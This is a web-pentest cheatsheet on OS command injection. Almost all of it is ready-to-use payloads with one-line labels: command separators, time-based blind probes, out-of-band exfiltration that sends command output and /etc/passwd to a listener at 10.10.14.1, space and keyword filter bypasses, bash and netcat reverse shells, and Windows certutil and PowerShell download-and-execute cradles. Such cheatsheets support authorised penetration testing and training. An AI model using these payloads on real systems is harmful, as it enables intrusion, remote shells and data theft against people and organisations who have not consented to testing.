← All Cheatsheets
web-pentest

Command Injection

OS command injection — separators and substitution, blind/time-based detection, OOB exfiltration, space/keyword/WAF bypasses, reverse shells and Windows command injection.

0 views May 2026 lazyhackers
Separators (8)
; id
Chain a second command (semicolon)
separator unix
| id
Pipe into the injected command
separator
|| id
Run only if the first command fails
separator
& id
Background separator (also Windows)
separator
&& id
Run if the first command succeeds
separator
`id`
Backtick command substitution
substitution unix
$(id)
Modern command substitution
substitution unix
%0aid
URL-encoded newline as a separator
separator encoding
Blind / Time-Based (4)
; sleep 5
Confirm blind injection via a delay (Unix)
blind time
$(sleep 5)
Time delay via substitution
blind time
; ping -c 5 127.0.0.1
Unix delay via ping
blind time
& ping -n 5 127.0.0.1
Windows delay via ping
blind time windows
Out-of-Band Exfil (4)
; curl http://10.10.14.1/$(whoami)
Exfil command output via an HTTP callback
oob exfil
; nslookup `whoami`.10.10.14.1
DNS exfil of command output
oob dns
; curl --data @/etc/passwd http://10.10.14.1/
POST a file to your listener
oob exfil
; wget http://10.10.14.1/$(id|base64)
Base64 the output to survive URL/DNS rules
oob encoding
Space & Keyword Bypass (6)
cat${IFS}/etc/passwd
${IFS} substitutes for a blocked space
bypass space
{cat,/etc/passwd}
Brace expansion avoids spaces
bypass space
cat</etc/passwd
Input redirection instead of a space
bypass space
c''at /et''c/pa''sswd
Empty quotes break keyword matching
bypass quotes
/???/?at /etc/passwd
Glob wildcards avoid literal binary names
bypass wildcard
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash
Base64-decode then execute
bypass base64
Reverse Shells (3)
; bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
Bash reverse shell
revshell bash
; nc -e /bin/bash 10.10.14.1 4444
Netcat reverse shell
revshell nc
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1 4444 >/tmp/f
Netcat (no -e) FIFO reverse shell
revshell nc fifo
Windows (4)
& whoami
Windows command separator
windows separator
& certutil -urlcache -f http://10.10.14.1/s.exe s.exe & s.exe
Download + execute a payload (certutil)
windows download
& powershell -enc <BASE64>
Run an encoded PowerShell command
windows powershell
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/s.ps1')"
PowerShell download-cradle
windows powershell cradle

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h